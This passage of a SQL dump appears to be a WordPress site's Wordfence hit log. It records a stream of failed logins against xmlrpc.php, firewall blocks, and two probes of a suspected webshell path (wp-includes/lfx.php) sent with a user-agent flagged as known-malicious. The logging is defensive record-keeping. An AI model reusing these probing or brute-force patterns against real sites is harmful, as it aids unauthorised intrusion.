Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(275,0.000000,1624449373.508780,'\0\0\0\0\0\0\0\0\0\0��N/u�',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(276,0.000000,1624449450.400491,'\0\0\0\0\0\0\0\0\0\0���;��',0,200,0,1,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(277,0.000000,1624449541.479486,'\0\0\0\0\0\0\0\0\0\0��r��>',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(278,0.000000,1624449729.417910,'\0\0\0\0\0\0\0\0\0\0��\rCrc',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(279,0.000000,1624449816.363517,'\0\0\0\0\0\0\0\0\0\0��r��>',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(280,0.000000,1624449870.885269,'\0\0\0\0\0\0\0\0\0\0��\"�F',0,200,0,1,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(281,0.000000,1624449952.541452,'\0\0\0\0\0\0\0\0\0\0��|��+',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(282,0.000000,1624450008.123574,'\0\0\0\0\0\0\0\0\0\0���Dx1',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(283,0.000000,1624450095.306095,'\0\0\0\0\0\0\0\0\0\0����',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(284,0.000000,1624450237.352196,'\0\0\0\0\0\0\0\0\0\0��j��',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(285,0.000000,1624450735.431332,'\0\0\0\0\0\0\0\0\0\0���G�R',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(286,0.000000,1624450806.979012,'\0\0\0\0\0\0\0\0\0\0��Xcڌ',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(287,0.000000,1624450860.902638,'\0\0\0\0\0\0\0\0\0\0��h�*�',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(288,0.000000,1624451091.289224,'\0\0\0\0\0\0\0\0\0\0���ɧ�',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(289,0.000000,1624451151.126483,'\0\0\0\0\0\0\0\0\0\0��%:0�',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(290,0.000000,1624451245.507918,'\0\0\0\0\0\0\0\0\0\0����',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(291,0.000000,1624451370.645857,'\0\0\0\0\0\0\0\0\0\0��co�',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(292,0.000000,1624451516.383628,'\0\0\0\0\0\0\0\0\0\0���ɠ�',0,200,0,1,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(293,0.000000,1624451657.247613,'\0\0\0\0\0\0\0\0\0\0���0Z�',0,200,0,1,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(294,0.000000,1624451942.950838,'\0\0\0\0\0\0\0\0\0\0���0Z�',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(295,0.000000,1624452077.848746,'\0\0\0\0\0\0\0\0\0\0��Xcڌ',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(296,0.000000,1624452233.690442,'\0\0\0\0\0\0\0\0\0\0��-��#',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(297,0.000000,1624452271.917101,'\0\0\0\0\0\0\0\0\0\0��N/u�',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(298,0.000000,1624452363.159120,'\0\0\0\0\0\0\0\0\0\0����2<',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(299,0.000000,1624452439.820794,'\0\0\0\0\0\0\0\0\0\0��j��',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(300,0.000000,1624452578.675218,'\0\0\0\0\0\0\0\0\0\0���b�',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(301,0.000000,1624452614.431854,'\0\0\0\0\0\0\0\0\0\0����`�',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(302,0.000000,1624452711.061933,'\0\0\0\0\0\0\0\0\0\0��-O#(',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(303,0.000000,1624452798.254806,'\0\0\0\0\0\0\0\0\0\0���?�',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(304,0.000000,1624452941.568873,'\0\0\0\0\0\0\0\0\0\0���ń�',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(305,0.000000,1624452999.984630,'\0\0\0\0\0\0\0\0\0\0���&V�',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(306,0.000000,1624453050.246509,'\0\0\0\0\0\0\0\0\0\0���Dx1',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(307,0.000000,1624453292.324736,'\0\0\0\0\0\0\0\0\0\0����',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(308,0.000000,1624453355.080644,'\0\0\0\0\0\0\0\0\0\0���b�',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(309,0.000000,1624453492.142855,'\0\0\0\0\0\0\0\0\0\0��Xcڌ',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(310,0.000000,1624453580.702019,'\0\0\0\0\0\0\0\0\0\0���YY�',0,200,0,1,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(311,0.000000,1624453704.577916,'\0\0\0\0\0\0\0\0\0\0���c?',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(312,0.000000,1624454106.292718,'\0\0\0\0\0\0\0\0\0\0����\'',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(313,0.000000,1624454170.475566,'\0\0\0\0\0\0\0\0\0\0���E4�',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(314,0.000000,1624454334.712520,'\0\0\0\0\0\0\0\0\0\0��N/u�',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(315,0.000000,1624454386.192328,'\0\0\0\0\0\0\0\0\0\0����ɢ',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(316,0.000000,1624454468.796754,'\0\0\0\0\0\0\0\0\0\0���y��',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(317,0.000000,1624454658.298362,'\0\0\0\0\0\0\0\0\0\0���\n',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(318,0.000000,1624454755.169954,'\0\0\0\0\0\0\0\0\0\0���&V�',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(319,1624454787.467200,1624454787.134018,'\0\0\0\0\0\0\0\0\0\0��X�',0,404,0,0,0,'https://yorkshirecricketboard.org.uk/wp-includes/lfx.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','learned:waf','Known malicious User-Agents','{\"learningMode\":1,\"failedRules\":[307],\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"category\":\"brute-force\",\"ssl\":true}'),(320,1624454791.517300,1624454791.510392,'\0\0\0\0\0\0\0\0\0\0��X�',0,404,0,0,0,'https://yorkshirecricketboard.org.uk/wp-includes/lfx.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','learned:waf','Known malicious User-Agents','{\"learningMode\":1,\"failedRules\":[307],\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"category\":\"brute-force\",\"ssl\":true}'),(321,0.000000,1624454825.729185,'\0\0\0\0\0\0\0\0\0\0���i�9',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(322,0.000000,1624454993.460623,'\0\0\0\0\0\0\0\0\0\0���YY�',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(323,0.000000,1624455046.347608,'\0\0\0\0\0\0\0\0\0\0��/\\�',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(324,0.000000,1624455114.058397,'\0\0\0\0\0\0\0\0\0\0��\0',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(325,0.000000,1624455250.589050,'\0\0\0\0\0\0\0\0\0\0��>m	y',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(326,0.000000,1624455360.198481,'\0\0\0\0\0\0\0\0\0\0�����0',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(327,0.000000,1624455472.790933,'\0\0\0\0\0\0\0\0\0\0��|��+',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(328,0.000000,1624455644.390184,'\0\0\0\0\0\0\0\0\0\0���G�R',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(329,0.000000,1624455829.135384,'\0\0\0\0\0\0\0\0\0\0����� ',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(330,0.000000,1624456058.559171,'\0\0\0\0\0\0\0\0\0\0��F#ŕ',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(331,0.000000,1624456335.493753,'\0\0\0\0\0\0\0\0\0\0��_�E�',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(332,0.000000,1624456643.525057,'\0\0\0\0\0\0\0\0\0\0����w�',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(333,0.000000,1624456855.660552,'\0\0\0\0\0\0\0\0\0\0����9d',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(334,0.000000,1624457006.292534,'\0\0\0\0\0\0\0\0\0\0��V?F',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(335,0.000000,1624457085.110342,'\0\0\0\0\0\0\0\0\0\0���X�|',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(336,0.000000,1624457223.783471,'\0\0\0\0\0\0\0\0\0\0��’)d',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(337,0.000000,1624457379.844786,'\0\0\0\0\0\0\0\0\0\0����2<',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(338,0.000000,1624457441.475491,'\0\0\0\0\0\0\0\0\0\0��Xcڌ',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(339,0.000000,1624457530.552420,'\0\0\0\0\0\0\0\0\0\0����',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(340,0.000000,1624457742.244850,'\0\0\0\0\0\0\0\0\0\0��\r~�',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(341,0.000000,1624457818.315766,'\0\0\0\0\0\0\0\0\0\0��Xcڌ',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(342,0.000000,1624458058.423600,'\0\0\0\0\0\0\0\0\0\0���YY�',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(343,0.000000,1624458099.159313,'\0\0\0\0\0\0\0\0\0\0���ɠ�',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(344,0.000000,1624458323.688676,'\0\0\0\0\0\0\0\0\0\0��>m	y',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(345,0.000000,1624458546.605696,'\0\0\0\0\0\0\0\0\0\0���?�',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(346,0.000000,1624458710.082136,'\0\0\0\0\0\0\0\0\0\0����}�',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(347,0.000000,1624458840.307859,'\0\0\0\0\0\0\0\0\0\0���X�$',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(348,0.000000,1624458909.951447,'\0\0\0\0\0\0\0\0\0\0��N/u�',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(349,0.000000,1624459136.142558,'\0\0\0\0\0\0\0\0\0\0��Xc�f',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(350,0.000000,1624459203.727310,'\0\0\0\0\0\0\0\0\0\0���0Z�',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(351,0.000000,1624459447.815203,'\0\0\0\0\0\0\0\0\0\0��/\\�',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(352,0.000000,1624459500.469148,'\0\0\0\0\0\0\0\0\0\0��-O#(',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(353,0.000000,1624459726.222461,'\0\0\0\0\0\0\0\0\0\0��co�',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(354,0.000000,1624460157.142091,'\0\0\0\0\0\0\0\0\0\0��%:0�',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(355,0.000000,1624460384.670355,'\0\0\0\0\0\0\0\0\0\0��Xc�f',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(356,0.000000,1624460456.799679,'\0\0\0\0\0\0\0\0\0\0���&V�',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(357,0.000000,1624460746.293523,'\0\0\0\0\0\0\0\0\0\0��V?F',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(358,0.000000,1624460826.538425,'\0\0\0\0\0\0\0\0\0\0��-7<n',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(359,0.000000,1624460905.619205,'\0\0\0\0\0\0\0\0\0\0��’)d',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(360,0.000000,1624460964.374163,'\0\0\0\0\0\0\0\0\0\0���FzC',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(361,0.000000,1624461274.337327,'\0\0\0\0\0\0\0\0\0\0���E4�',0,200,0,1,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(362,0.000000,1624461313.362622,'\0\0\0\0\0\0\0\0\0\0��N/u�',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(363,0.000000,1624461493.086830,'\0\0\0\0\0\0\0\0\0\0���~A',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 